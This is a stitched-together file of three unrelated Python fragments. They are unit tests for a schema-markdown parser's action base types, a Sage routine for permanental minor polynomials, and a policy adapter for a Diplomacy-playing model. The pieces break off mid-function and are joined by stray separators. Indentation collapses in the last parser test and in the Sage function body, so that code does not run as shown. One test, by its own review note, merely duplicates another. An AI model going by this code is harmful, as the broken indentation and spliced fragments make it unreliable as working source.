                        {'name': 'd', 'type': {'builtin': 'datetime'}}
                    ]
                }
            },
            'Bonk': {
                'struct': {
                    'name': 'Bonk',
                    'members': [
                        {'name': 'c', 'type': {'builtin': 'float'}, 'attr': {'nullable': True}}
                    ]
                }
            },
            'Foo': {
                'struct': {
                    'name': 'Foo',
                    'members': [
                        {'name': 'a', 'type': {'builtin': 'int'}},
                        {'name': 'b', 'optional': True, 'type': {'builtin': 'string'}}
                    ]
                }
            },
            'FooAction': {
                'action': {
                    'name': 'FooAction',
                    'path': 'FooAction_path'
                }
            },
            'FooAction_path': {
                'struct': {
                    'name': 'FooAction_path',
                    'bases': ['Foo'],
                    'members': [
                        {'name': 'c', 'type': {'builtin': 'bool'}}
                    ]
                }
            }
        })
        self.assertListEqual(parser.errors, [])
    def test_action_path_non_struct(self):
        """Non-struct base types in an action 'path' section are rejected with per-line errors."""
        parser = SchemaMarkdownParser()
        with self.assertRaises(SchemaMarkdownParserError) as cm_exc:
            parser.parse_string('''\
action FooAction
    path (Foo)
        #- will not error
        float a

enum Foo
    A
    B

struct MyStruct
    int a

action BarAction
    path (Foo, MyStruct)

union MyUnion

action BonkAction
    path (MyStruct, MyUnion)
        float a

typedef string{} MyDict

action MyDictAction
    path (MyDict)
        int a
''')
        # Line numbers in the error strings refer to the schema text above.
        expected_errors = [
            ":2: error: Invalid struct base type 'Foo'",
            ":14: error: Invalid struct base type 'Foo'",
            ":19: error: Invalid struct base type 'MyUnion'",
            ":20: error: Redefinition of 'BonkAction_path' member 'a'",
            ":25: error: Invalid struct base type 'MyDict'"
        ]
        self.assertListEqual(cm_exc.exception.errors, expected_errors)
        self.assertListEqual(parser.errors, expected_errors)
    def test_action_query_base_types(self):
        """An action 'query' section may list struct base types; the generated '<action>_query' struct inherits them."""
        parser = SchemaMarkdownParser()
        parser.parse_string('''\
struct Foo
    int a
    optional string b

struct Bonk
    float(nullable) c

typedef Bonk Bar

action FooAction
    query (Foo)
        bool c

action BarAction
    query (Foo, Bar)
        datetime d
''')
        # The synthesized *_query structs carry the base-type list verbatim.
        self.assertDictEqual(parser.types, {
            'Bar': {
                'typedef': {
                    'name': 'Bar',
                    'type': {'user': 'Bonk'}
                }
            },
            'BarAction': {
                'action': {
                    'name': 'BarAction',
                    'query': 'BarAction_query'
                }
            },
            'BarAction_query': {
                'struct': {
                    'name': 'BarAction_query',
                    'bases': ['Foo', 'Bar'],
                    'members': [
                        {'name': 'd', 'type': {'builtin': 'datetime'}}
                    ]
                }
            },
            'Bonk': {
                'struct': {
                    'name': 'Bonk',
                    'members': [
                        {'name': 'c', 'type': {'builtin': 'float'}, 'attr': {'nullable': True}}
                    ]
                }
            },
            'Foo': {
                'struct': {
                    'name': 'Foo',
                    'members': [
                        {'name': 'a', 'type': {'builtin': 'int'}},
                        {'name': 'b', 'optional': True, 'type': {'builtin': 'string'}}
                    ]
                }
            },
            'FooAction': {
                'action': {
                    'name': 'FooAction',
                    'query': 'FooAction_query'
                }
            },
            'FooAction_query': {
                'struct': {
                    'name': 'FooAction_query',
                    'bases': ['Foo'],
                    'members': [
                        {'name': 'c', 'type': {'builtin': 'bool'}}
                    ]
                }
            }
        })
        self.assertListEqual(parser.errors, [])
    def test_action_query_non_struct(self):
        """Non-struct base types in an action 'query' section are rejected with per-line errors."""
        parser = SchemaMarkdownParser()
        with self.assertRaises(SchemaMarkdownParserError) as cm_exc:
            parser.parse_string('''\
action FooAction
    query (Foo)
        #- will not error
        float a

enum Foo
    A
    B

struct MyStruct
    int a

action BarAction
    query (Foo, MyStruct)

union MyUnion

action BonkAction
    query (MyStruct, MyUnion)
        float a

typedef string{} MyDict

action MyDictAction
    query (MyDict)
        int a
''')
        # Line numbers in the error strings refer to the schema text above.
        expected_errors = [
            ":2: error: Invalid struct base type 'Foo'",
            ":14: error: Invalid struct base type 'Foo'",
            ":19: error: Invalid struct base type 'MyUnion'",
            ":20: error: Redefinition of 'BonkAction_query' member 'a'",
            ":25: error: Invalid struct base type 'MyDict'"
        ]
        self.assertListEqual(cm_exc.exception.errors, expected_errors)
        self.assertListEqual(parser.errors, expected_errors)
    def test_action_input_base_types(self):
        """An action 'input' section may list struct base types; the generated '<action>_input' struct inherits them."""
        parser = SchemaMarkdownParser()
        parser.parse_string('''\
struct Foo
    int a
    optional string b

struct Bonk
    float(nullable) c

typedef Bonk Bar

action FooAction
    input (Foo)
        bool c

action BarAction
    input (Foo, Bar)
        datetime d
''')
        # The synthesized *_input structs carry the base-type list verbatim.
        self.assertDictEqual(parser.types, {
            'Bar': {
                'typedef': {
                    'name': 'Bar',
                    'type': {'user': 'Bonk'}
                }
            },
            'BarAction': {
                'action': {
                    'name': 'BarAction',
                    'input': 'BarAction_input'
                }
            },
            'BarAction_input': {
                'struct': {
                    'name': 'BarAction_input',
                    'bases': ['Foo', 'Bar'],
                    'members': [
                        {'name': 'd', 'type': {'builtin': 'datetime'}}
                    ]
                }
            },
            'Bonk': {
                'struct': {
                    'name': 'Bonk',
                    'members': [
                        {'name': 'c', 'type': {'builtin': 'float'}, 'attr': {'nullable': True}}
                    ]
                }
            },
            'Foo': {
                'struct': {
                    'name': 'Foo',
                    'members': [
                        {'name': 'a', 'type': {'builtin': 'int'}},
                        {'name': 'b', 'optional': True, 'type': {'builtin': 'string'}}
                    ]
                }
            },
            'FooAction': {
                'action': {
                    'name': 'FooAction',
                    'input': 'FooAction_input'
                }
            },
            'FooAction_input': {
                'struct': {
                    'name': 'FooAction_input',
                    'bases': ['Foo'],
                    'members': [
                        {'name': 'c', 'type': {'builtin': 'bool'}}
                    ]
                }
            }
        })
        self.assertListEqual(parser.errors, [])
    def test_action_input_non_struct(self):
        """Non-struct base types in an action 'input' section are rejected with per-line errors."""
        parser = SchemaMarkdownParser()
        with self.assertRaises(SchemaMarkdownParserError) as cm_exc:
            parser.parse_string('''\
action FooAction
    input (Foo)
        #- will not error
        float a

enum Foo
    A
    B

struct MyStruct
    int a

action BarAction
    input (Foo, MyStruct)

union MyUnion

action BonkAction
    input (MyStruct, MyUnion)
        float a

typedef string{} MyDict

action MyDictAction
    input (MyDict)
        int a
''')
        # Line numbers in the error strings refer to the schema text above.
        expected_errors = [
            ":2: error: Invalid struct base type 'Foo'",
            ":14: error: Invalid struct base type 'Foo'",
            ":19: error: Invalid struct base type 'MyUnion'",
            ":20: error: Redefinition of 'BonkAction_input' member 'a'",
            ":25: error: Invalid struct base type 'MyDict'",
        ]
        self.assertListEqual(cm_exc.exception.errors, expected_errors)
        self.assertListEqual(parser.errors, expected_errors)
    def test_action_input_member_redef(self):
        """Member redefinition through an action 'input' section is reported as an error.

        NOTE(review): this test body is a verbatim copy of test_action_input_non_struct and
        does not actually exercise a member-redefinition-only scenario (beyond the single
        ':20:' error shared with that test) — confirm intended coverage.
        """
        parser = SchemaMarkdownParser()
        with self.assertRaises(SchemaMarkdownParserError) as cm_exc:
            parser.parse_string('''\
action FooAction
    input (Foo)
        #- will not error
        float a

enum Foo
    A
    B

struct MyStruct
    int a

action BarAction
    input (Foo, MyStruct)

union MyUnion

action BonkAction
    input (MyStruct, MyUnion)
        float a

typedef string{} MyDict

action MyDictAction
    input (MyDict)
        int a
''')
        # Line numbers in the error strings refer to the schema text above.
        expected_errors = [
            ":2: error: Invalid struct base type 'Foo'",
            ":14: error: Invalid struct base type 'Foo'",
            ":19: error: Invalid struct base type 'MyUnion'",
            ":20: error: Redefinition of 'BonkAction_input' member 'a'",
            ":25: error: Invalid struct base type 'MyDict'"
        ]
        self.assertListEqual(cm_exc.exception.errors, expected_errors)
        self.assertListEqual(parser.errors, expected_errors)
    def test_action_output_struct(self):
        """An action 'output' section may list struct base types; the generated '<action>_output' struct inherits them."""
        parser = SchemaMarkdownParser()
        parser.parse_string('''\
struct Foo
    int a
    optional string b

struct Bonk
    float(nullable) c

typedef Bonk Bar

action FooAction
    output (Foo)
        bool c

action BarAction
    output (Foo, Bar)
        datetime d
''')
        # The synthesized *_output structs carry the base-type list verbatim.
        self.assertDictEqual(parser.types, {
            'Bar': {
                'typedef': {
                    'name': 'Bar',
                    'type': {'user': 'Bonk'}
                }
            },
            'BarAction': {
                'action': {
                    'name': 'BarAction',
                    'output': 'BarAction_output'
                }
            },
            'BarAction_output': {
                'struct': {
                    'name': 'BarAction_output',
                    'bases': ['Foo', 'Bar'],
                    'members': [
                        {'name': 'd', 'type': {'builtin': 'datetime'}}
                    ]
                }
            },
            'Bonk': {
                'struct': {
                    'name': 'Bonk',
                    'members': [
                        {'name': 'c', 'type': {'builtin': 'float'}, 'attr': {'nullable': True}}
                    ]
                }
            },
            'Foo': {
                'struct': {
                    'name': 'Foo',
                    'members': [
                        {'name': 'a', 'type': {'builtin': 'int'}},
                        {'name': 'b', 'optional': True, 'type': {'builtin': 'string'}}
                    ]
                }
            },
            'FooAction': {
                'action': {
                    'name': 'FooAction',
                    'output': 'FooAction_output'
                }
            },
            'FooAction_output': {
                'struct': {
                    'name': 'FooAction_output',
                    'bases': ['Foo'],
                    'members': [
                        {'name': 'c', 'type': {'builtin': 'bool'}}
                    ]
                }
            }
        })
        self.assertListEqual(parser.errors, [])
    def test_action_output_non_struct(self):
        """Non-struct base types in an action 'output' section are rejected with per-line errors."""
        parser = SchemaMarkdownParser()
        with self.assertRaises(SchemaMarkdownParserError) as cm_exc:
            parser.parse_string('''\
action FooAction
    output (Foo)
        #- will not error
        float a

enum Foo
    A
    B

struct MyStruct
    int a

action BarAction
    output (Foo, MyStruct)

union MyUnion

action BonkAction
    output (MyStruct, MyUnion)
        float a

typedef string{} MyDict

action MyDictAction
    output (MyDict)
        #- will not error
        int a
''')
        # Line numbers in the error strings refer to the schema text above.
        expected_errors = [
            ":2: error: Invalid struct base type 'Foo'",
            ":14: error: Invalid struct base type 'Foo'",
            ":19: error: Invalid struct base type 'MyUnion'",
            ":20: error: Redefinition of 'BonkAction_output' member 'a'",
            ":25: error: Invalid struct base type 'MyDict'"
        ]
        self.assertListEqual(cm_exc.exception.errors, expected_errors)
        self.assertListEqual(parser.errors, expected_errors)
    def test_action_errors_enum(self):
        """An action 'errors' section may list enum base types; the generated '<action>_errors' enum inherits them."""
        parser = SchemaMarkdownParser()
        parser.parse_string('''\
action FooAction
    errors (Foo)
        C

enum Foo
    A
    B

enum Bonk
    C

typedef Bonk Bar

action BarAction
    errors (Foo, Bar)
        D
''')
        # The synthesized *_errors enums carry the base-type list verbatim.
        self.assertDictEqual(parser.types, {
            'Bar': {
                'typedef': {
                    'name': 'Bar',
                    'type': {'user': 'Bonk'}
                }
            },
            'BarAction': {
                'action': {
                    'name': 'BarAction',
                    'errors': 'BarAction_errors'
                }
            },
            'BarAction_errors': {
                'enum': {
                    'name': 'BarAction_errors',
                    'bases': ['Foo', 'Bar'],
                    'values': [
                        {'name': 'D'}
                    ]
                }
            },
            'Bonk': {
                'enum': {
                    'name': 'Bonk',
                    'values': [
                        {'name': 'C'}
                    ]
                }
            },
            'Foo': {
                'enum': {
                    'name': 'Foo',
                    'values': [
                        {'name': 'A'},
                        {'name': 'B'}
                    ]
                }
            },
            'FooAction': {
                'action': {
                    'errors': 'FooAction_errors',
                    'name': 'FooAction'
                }
            },
            'FooAction_errors': {
                'enum': {
                    'name': 'FooAction_errors',
                    'bases': ['Foo'],
                    'values': [
                        {'name': 'C'}
                    ]
                }
            }
        })
        self.assertListEqual(parser.errors, [])
    def test_action_errors_non_enum(self):
        """Non-enum base types in an action 'errors' section are rejected with per-line errors."""
        parser = SchemaMarkdownParser()
        with self.assertRaises(SchemaMarkdownParserError) as cm_exc:
            parser.parse_string('''\
action FooAction
    errors (Foo)

struct Foo

struct Bonk

typedef Bonk Bar

enum MyEnum
    A

action BarAction
    errors (MyEnum, Bar)
        A

action BonkAction
    errors (MyEnum)
        A
''')
        # Line numbers in the error strings refer to the schema text above.
        expected_errors = [
            ":2: error: Invalid enum base type 'Foo'",
            ":14: error: Invalid enum base type 'Bar'",
            ":15: error: Redefinition of 'BarAction_errors' value 'A'",
            ":19: error: Redefinition of 'BonkAction_errors' value 'A'"
        ]
        self.assertListEqual(cm_exc.exception.errors, expected_errors)
        self.assertListEqual(parser.errors, expected_errors)
    def test_finalize_no_parse(self):
        """finalize() can be called on a parser seeded with a types dict and no parse; the dict is kept by reference."""
        types = {
            'MyAction': {
                'action': {
                    'name': 'MyAction',
                    'query': 'MyAction_query'
                }
            },
            'MyAction_query': {
                'struct': {
                    'name': 'MyAction_query',
                    'members': [
                        {'name': 'a', 'type': {'builtin': 'int'}}
                    ]
                }
            },
            'OtherType': {}
        }
        parser = SchemaMarkdownParser(types=types)
        parser.finalize()
        # Same object, not a copy
        self.assertIs(parser.types, types)
def test_finalize_no_parse_error(self):
types = {
'MyAction': {
'action': {
'name': 'MyAction',
'query': 'MyAction_query',
'input': 'PositiveInt',
'output': 'MyAction_output'
}
},
'MyAction_input': {
'struct': {
'name': 'MyAction_input',
| |
"""
Miscellaneous matrix functions
"""
# ****************************************************************************
# Copyright (C) 2008 <NAME> <<EMAIL>>
#
# Distributed under the terms of the GNU General Public License (GPL)
#
# This code is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# The full text of the GPL is available at:
#
# http://www.gnu.org/licenses/
#*****************************************************************************
from sage.categories.fields import Fields
_Fields = Fields()
def row_iterator(A):
    """Yield the rows of the matrix ``A``, one at a time, in order."""
    row_count = A.nrows()
    for index in range(row_count):
        yield A.row(index)
def prm_mul(p1, p2, mask_free, prec):
    """
    Return the product of ``p1`` and ``p2``, setting the free variables in
    ``mask_free`` to `1`.

    This function is mainly used as a subroutine of
    :func:`permanental_minor_polynomial`.

    INPUT:

    - `p1,p2` -- polynomials as dictionaries
    - `mask_free` -- an integer mask that gives the list of free variables
      (the `i`-th variable is free if the `i`-th bit of ``mask_free`` is `1`)
    - `prec` -- if `prec` is not None, truncate the product at precision `prec`

    EXAMPLES::

        sage: from sage.matrix.matrix_misc import prm_mul
        sage: t = polygen(ZZ, 't')
        sage: p1 = {0: 1, 1: t, 4: t}
        sage: p2 = {0: 1, 1: t, 2: t}
        sage: prm_mul(p1, p2, 1, None)
        {0: 2*t + 1, 2: t^2 + t, 4: t^2 + t, 6: t^2}
    """
    product = {}
    if not p2:
        return product
    for mono1, coeff1 in p1.items():
        if coeff1.is_zero():
            continue
        for mono2, coeff2 in p2.items():
            # Variables are nilpotent of order 2: a shared bit means a
            # repeated eta_i, which annihilates the whole term.
            if mono1 & mono2:
                continue
            coeff = coeff1 * coeff2
            if prec is not None:
                # Truncate the polynomial in t at degree `prec`.
                coeff._unsafe_mutate(prec, 0)
            # Merge the monomials and "integrate out" the free variables
    # (clearing their bits is equivalent to exp ^ (exp & mask_free)).
            mono = (mono1 | mono2) & ~mask_free
            if mono in product:
                product[mono] += coeff
            else:
                product[mono] = coeff
    return product
def permanental_minor_polynomial(A, permanent_only=False, var='t', prec=None):
r"""
Return the polynomial of the sums of permanental minors of ``A``.
INPUT:
- `A` -- a matrix
- `permanent_only` -- if True, return only the permanent of `A`
- `var` -- name of the polynomial variable
- `prec` -- if prec is not None, truncate the polynomial at precision `prec`
The polynomial of the sums of permanental minors is
.. MATH::
\sum_{i=0}^{min(nrows, ncols)} p_i(A) x^i
where `p_i(A)` is the `i`-th permanental minor of `A` (that can also be
obtained through the method
:meth:`~sage.matrix.matrix2.Matrix.permanental_minor` via
``A.permanental_minor(i)``).
The algorithm implemented by that function has been developed by <NAME>
and <NAME>, see [BP2015]_. Its complexity is `O(2^n m^2 n)` where `m` and
`n` are the number of rows and columns of `A`. Moreover, if `A` is a banded
matrix with width `w`, that is `A_{ij}=0` for `|i - j| > w` and `w < n/2`,
then the complexity of the algorithm is `O(4^w (w+1) n^2)`.
INPUT:
- ``A`` -- matrix
- ``permanent_only`` -- optional boolean. If ``True``, only the permanent
is computed (might be faster).
- ``var`` -- a variable name
EXAMPLES::
sage: from sage.matrix.matrix_misc import permanental_minor_polynomial
sage: m = matrix([[1,1],[1,2]])
sage: permanental_minor_polynomial(m)
3*t^2 + 5*t + 1
sage: permanental_minor_polynomial(m, permanent_only=True)
3
sage: permanental_minor_polynomial(m, prec=2)
5*t + 1
::
sage: M = MatrixSpace(ZZ,4,4)
sage: A = M([1,0,1,0,1,0,1,0,1,0,10,10,1,0,1,1])
sage: permanental_minor_polynomial(A)
84*t^3 + 114*t^2 + 28*t + 1
sage: [A.permanental_minor(i) for i in range(5)]
[1, 28, 114, 84, 0]
An example over `\QQ`::
sage: M = MatrixSpace(QQ,2,2)
sage: A = M([1/5,2/7,3/2,4/5])
sage: permanental_minor_polynomial(A, True)
103/175
An example with polynomial coefficients::
sage: R.<a> = PolynomialRing(ZZ)
sage: A = MatrixSpace(R,2)([[a,1], [a,a+1]])
sage: permanental_minor_polynomial(A, True)
a^2 + 2*a
A usage of the ``var`` argument::
sage: m = matrix(ZZ,4,[0,1,2,3,1,2,3,0,2,3,0,1,3,0,1,2])
sage: permanental_minor_polynomial(m, var='x')
164*x^4 + 384*x^3 + 172*x^2 + 24*x + 1
ALGORITHM:
The permanent `perm(A)` of a `n \times n` matrix `A` is the coefficient
of the `x_1 x_2 \ldots x_n` monomial in
.. MATH::
\prod_{i=1}^n \left( \sum_{j=1}^n A_{ij} x_j \right)
Evaluating this product one can neglect `x_i^2`, that is `x_i`
can be considered to be nilpotent of order `2`.
To formalize this procedure, consider the algebra
`R = K[\eta_1, \eta_2, \ldots, \eta_n]` where the `\eta_i` are
commuting, nilpotent of order `2` (i.e. `\eta_i^2 = 0`).
Formally it is the quotient ring of the polynomial
ring in `\eta_1, \eta_2, \ldots, \eta_n` quotiented by the ideal
generated by the `\eta_i^2`.
We will mostly consider the ring `R[t]` of polynomials over `R`. We
denote a generic element of `R[t]` by `p(\eta_1, \ldots, \eta_n)` or
`p(\eta_{i_1}, \ldots, \eta_{i_k})` if we want to emphasize that some
monomials in the `\eta_i` are missing.
Introduce an "integration" operation `\langle p \rangle` over `R` and
`R[t]` consisting in the sum of the coefficients of the non-vanishing
monomials in `\eta_i` (i.e. the result of setting all variables `\eta_i`
to `1`). Let us emphasize that this is *not* a morphism of algebras as
`\langle \eta_1 \rangle^2 = 1` while `\langle \eta_1^2 \rangle = 0`!
Let us consider an example of computation.
Let `p_1 = 1 + t \eta_1 + t \eta_2` and
`p_2 = 1 + t \eta_1 + t \eta_3`. Then
.. MATH::
p_1 p_2 = 1 + 2t \eta_1 +
t (\eta_2 + \eta_3) +
t^2 (\eta_1 \eta_2 + \eta_1 \eta_3 + \eta_2 \eta_3)
and
.. MATH::
\langle p_1 p_2 \rangle = 1 + 4t + 3t^2
In this formalism, the permanent is just
.. MATH::
perm(A) = \langle \prod_{i=1}^n \sum_{j=1}^n A_{ij} \eta_j \rangle
A useful property of `\langle . \rangle` which makes this algorithm
efficient for band matrices is the following: let
`p_1(\eta_1, \ldots, \eta_n)` and `p_2(\eta_j, \ldots, \eta_n)` be
polynomials in `R[t]` where `j \ge 1`. Then one has
.. MATH::
\langle p_1(\eta_1, \ldots, \eta_n) p_2 \rangle =
\langle p_1(1, \ldots, 1, \eta_j, \ldots, \eta_n) p_2 \rangle
where `\eta_1,..,\eta_{j-1}` are replaced by `1` in `p_1`. Informally,
we can "integrate" these variables *before* performing the product. More
generally, if a monomial `\eta_i` is missing in one of the terms of a
product of two terms, then it can be integrated in the other term.
Now let us consider an `m \times n` matrix with `m \leq n`. The *sum of
permanental `k`-minors of `A`* is
.. MATH::
perm(A, k) = \sum_{r,c} perm(A_{r,c})
where the sum is over the `k`-subsets `r` of rows and `k`-subsets `c` of
columns and `A_{r,c}` is the submatrix obtained from `A` by keeping only
the rows `r` and columns `c`. Of course
`perm(A, \min(m,n)) = perm(A)` and note that `perm(A,1)` is just the sum
of all entries of the matrix.
The generating function of these sums of permanental minors is
.. MATH::
g(t) = \left\langle
\prod_{i=1}^m \left(1 + t \sum_{j=1}^n A_{ij} \eta_j\right)
\right\rangle
In fact the `t^k` coefficient of `g(t)` corresponds to choosing
`k` rows of `A`; `\eta_i` is associated to the i-th column;
nilpotency avoids having twice the same column in a product of `A`'s.
For more details, see the article [BP2015]_.
From a technical point of view, the product in
`K[\eta_1, \ldots, \eta_n][t]` is implemented as a subroutine in
:func:`prm_mul`. The indices of the rows and columns actually start at
`0`, so the variables are `\eta_0, \ldots, \eta_{n-1}`. Polynomials are
represented in dictionary form: to a variable `\eta_i` is associated
the key `2^i` (or in Python ``1 << i``). The keys associated to products
are obtained by considering the development in base `2`: to the monomial
`\eta_{i_1} \ldots \eta_{i_k}` is associated the key
`2^{i_1} + \ldots + 2^{i_k}`. So the product `\eta_1 \eta_2` corresponds
to the key `6 = (110)_2` while `\eta_0 \eta_3` has key `9 = (1001)_2`.
In particular all operations on monomials are implemented via bitwise
operations on the keys.
"""
if permanent_only:
prec = None
elif prec is not None:
prec = int(prec)
if prec == 0:
raise ValueError('the argument `prec` must be a positive integer')
from sage.rings.polynomial.polynomial_ring_constructor import PolynomialRing
K = PolynomialRing(A.base_ring(), var)
nrows = A.nrows()
ncols = A.ncols()
A = A.rows()
p = {0: K.one()}
t = K.gen()
vars_to_do = list(range(ncols))
for i in range(nrows):
# build the polynomial p1 = 1 + t sum A_{ij} eta_j
if permanent_only:
p1 | |
# ==============================================================================
# Copyright 2019 - <NAME>
#
# NOTICE: Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# ==============================================================================
""" OrderBased Policy Adapter
- Implements an instance of a policy adapter to connect to a order_based model
"""
from collections import OrderedDict
import logging
import numpy as np
from numpy.random import choice
from tornado import gen
from diplomacy_research.models.policy.base_policy_adapter import BasePolicyAdapter
from diplomacy_research.models.policy.base_policy_model import OrderProbTokenLogProbs, TRAINING_DECODER, \
GREEDY_DECODER, SAMPLE_DECODER
from diplomacy_research.models.policy.order_based.model import OrderBasedPolicyModel
from diplomacy_research.models.state_space import GO_ID, EOS_ID, PAD_ID, order_to_ix, ix_to_order, \
get_orderable_locs_for_powers
from diplomacy_research.proto.diplomacy_proto.common_pb2 import MapStringList
from diplomacy_research.utils.cluster import CompletedFuture, process_fetches_dict
from diplomacy_research.utils.model import logsumexp, apply_temperature, strip_keys, assert_normalized
# Constants
LOGGER = logging.getLogger(__name__)
class PolicyAdapter(BasePolicyAdapter):
""" Adapter to connect to an OrderBased model """
    @staticmethod
    def get_signature():
        """ Returns the signature of all the possible calls using this adapter
            Format: { method_signature_name: {'placeholders': {name: (value, numpy_dtype)},
                                              'outputs': [output_name, output_name] } }
            e.g. {'policy_evaluate': {'placeholders': {'decoder_type': ([SAMPLE_DECODER], np.uint8)},
                                      'outputs': ['selected_tokens', 'log_probs', 'draw_prob']}}
        """
        # Literal signature table: each queue maps to the decoder type fed to the model
        # and the tensors fetched back. 'evaluate' queues sample from the policy,
        # 'beam_search' queues run a greedy decode over beams, and the
        # '_with_state_value' variants additionally fetch the value head.
        return {'policy_evaluate': {'placeholders': {'decoder_type': ([SAMPLE_DECODER], np.uint8)},
                                    'outputs': ['selected_tokens',
                                                'log_probs',
                                                'draw_prob']},
                'policy_beam_search': {'placeholders': {'decoder_type': ([GREEDY_DECODER], np.uint8)},
                                       'outputs': ['beam_tokens',
                                                   'beam_log_probs',
                                                   'draw_prob']},
                'policy_evaluate_with_state_value': {'placeholders': {'decoder_type': ([SAMPLE_DECODER], np.uint8)},
                                                     'outputs': ['selected_tokens',
                                                                 'log_probs',
                                                                 'draw_prob',
                                                                 'state_value']},
                'policy_beam_search_with_state_value': {'placeholders': {'decoder_type': ([GREEDY_DECODER], np.uint8)},
                                                        'outputs': ['beam_tokens',
                                                                    'beam_log_probs',
                                                                    'draw_prob',
                                                                    'state_value']},
                'policy_expand': {'placeholders': {'decoder_type': ([TRAINING_DECODER], np.uint8)},
                                  'outputs': ['logits']},
                'policy_log_probs': {'placeholders': {'decoder_type': ([TRAINING_DECODER], np.uint8)},
                                     'outputs': ['log_probs', 'draw_prob']},
                'policy_get_value': {'placeholders': {'decoder_type': ([GREEDY_DECODER], np.uint8)},
                                     'outputs': ['state_value']}}
def tokenize(self, order):
""" Returns the tokens use by the adapter for a specific order """
return [order_to_ix(order) or PAD_ID]
def _decode_policy(self, locs, state_proto, power_name, phase_history_proto, possible_orders_proto, **kwargs):
""" Returns the output of the Policy Model decoder
:param locs: A list of locations for which we want orders
:param state_proto: A `.proto.game.State` representation of the state of the game.
:param power_name: The power name for which we want the orders and the state values
:param phase_history_proto: A list of `.proto.game.PhaseHistory`. This represents prev phases.
:param possible_orders_proto: A `proto.game.PossibleOrders` object representing possible order for each loc.
:param kwargs: Additional optional kwargs:
- player_seed: The seed to apply to the player to compute a deterministic mask.
- noise: The sigma of the additional noise to apply to the intermediate layers (i.e. sigma * epsilon)
- temperature: The temperature to apply to the logits. (Default to 0. for deterministic/greedy)
- dropout_rate: The amount of dropout to apply to the inputs/outputs of the decoder.
- with_state_value: Boolean that indicates to also query the value function.
- use_beam: Boolean that indicates that we want to use a beam search,
- retry_on_failure: Boolean that indicates to retry querying from the model if an error is encountered.
- prefetch: Boolean that indicates to return a dictionary of fetches (str: PrefetchedItem/Future)
- fetches: Dictionary of (str: future_results) that was computed with prefetch=True
:return: A future (fetches) to yield on.
"""
is_prefetching = kwargs.get('prefetch', False)
# No locations provided, we can return early
if not locs:
ret_val = None
return CompletedFuture(ret_val) if is_prefetching else ret_val
# Getting feedable item
feedable_item = self.feedable_dataset.get_feedable_item(locs,
state_proto,
power_name,
phase_history_proto,
possible_orders_proto,
**kwargs)
if not feedable_item:
LOGGER.warning('The method .get_feedable_item() did not return an item to feed to the model.')
LOGGER.warning('Make sure you have provided the correct locs and a list of possible orders')
ret_val = None
return CompletedFuture(ret_val) if is_prefetching else ret_val
# Queue
with_state_value = kwargs.get('with_state_value', False)
use_beam = kwargs.get('use_beam', False)
queue_name = {(False, False): 'policy_evaluate',
(False, True): 'policy_evaluate_with_state_value',
(True, False): 'policy_beam_search',
(True, True): 'policy_beam_search_with_state_value'}[(use_beam, with_state_value)]
return self.feedable_dataset.get_results(queue_name, feedable_item, **kwargs)
@staticmethod
def _process_fetches(decode_fetches):
""" Decodes the fetches returned by self._decode_policy()
:param decode_fetches: The fetches returned by self._decode_policy()
:return: An ordered dict with the location as key, and an OrderProbTokenLogProbs as value
"""
# If we get an empty list, we can't decode it
if not decode_fetches:
return decode_fetches
tokens, log_probs = decode_fetches[:2]
decoded_results = OrderBasedPolicyModel._decode(selected_tokens=np.array([tokens]), # pylint: disable=protected-access
log_probs=np.array([log_probs]))
return decoded_results['decoded_orders'][0]
    @staticmethod
    def _process_single_beam_fetches(decode_fetches, temperature=0.):
        """ Decodes the beam fetches returned self._decode_policy() - This samples the beam to use based on a temp.
            :param decode_fetches: The fetches returned by self._decode_policy()
            :param temperature: The temperature applied to the beam probabilities before sampling (0. = greedy).
            :return: An ordered dict with the location as key, and an OrderProbTokenLogProbs as value
        """
        # If we get an empty list, we can't decode it
        if not decode_fetches:
            return decode_fetches
        beam_tokens, beam_log_probs = decode_fetches[:2]

        # Computing probabilities after applying temperature
        # (softmax over the beam log probs, then temperature adjustment)
        probs = np.exp(beam_log_probs - logsumexp(beam_log_probs))
        adj_probs = apply_temperature(probs, temperature=temperature).tolist()
        nb_probs = len(probs)

        # Sampling according to probs
        selected_beam_id = choice(range(nb_probs), p=assert_normalized(adj_probs))

        # Decoding that specific beam
        # Assigning probability mass equally over all orders in beam
        selected_beam_tokens = np.array([beam_tokens[selected_beam_id]])
        selected_beam_log_probs = np.zeros_like(selected_beam_tokens)
        decoded_results = OrderBasedPolicyModel._decode(selected_tokens=selected_beam_tokens,       # pylint: disable=protected-access
                                                        log_probs=selected_beam_log_probs)['decoded_orders'][0]

        # Adjusting log probs to make it uniform over all locs
        # (the beam's total log prob is split evenly across its decoded locations)
        nb_locs = len(decoded_results)
        adj_log_probs = beam_log_probs[selected_beam_id] / max(1, nb_locs)
        decoded_results = {loc: OrderProbTokenLogProbs(order=decoded_results[loc].order,
                                                       probability=decoded_results[loc].probability,
                                                       log_probs=[adj_log_probs]) for loc in decoded_results}
        return decoded_results
@gen.coroutine
def get_orders(self, locs, state_proto, power_name, phase_history_proto, possible_orders_proto, **kwargs):
""" Finds the orders to submit at each location given the current state
Orderings are calculated by defining an ordering and computing the next unit order conditioned on the
orders already selected
:param locs: A list of locations for which we want orders
:param state_proto: A `.proto.game.State` representation of the state of the game.
:param power_name: The power name for which we want the orders and the state values
:param phase_history_proto: A list of `.proto.game.PhaseHistory`. This represents prev phases.
:param possible_orders_proto: A `proto.game.PossibleOrders` object representing possible order for each loc.
:param kwargs: Additional optional kwargs:
- player_seed: The seed to apply to the player to compute a deterministic mask.
- noise: The sigma of the additional noise to apply to the intermediate layers (i.e. sigma * epsilon)
- temperature: The temperature to apply to the logits. (Default to 0. for deterministic/greedy)
- dropout_rate: The amount of dropout to apply to the inputs/outputs of the decoder.
- with_state_value: Boolean that indicates to also query the value function.
- use_beam: Boolean that indicates that we want to use a beam search, (Default; False)
- retry_on_failure: Boolean that indicates to retry querying from the model if an error is encountered.
- prefetch: Boolean that indicates to return a dictionary of fetches (str: PrefetchedItem/Future)
- fetches: Dictionary of (str: future_results) that was computed with prefetch=True
:return:
- if prefetch=True, a dictionary of fetches (key as string, value is a future (or list) to yield on)
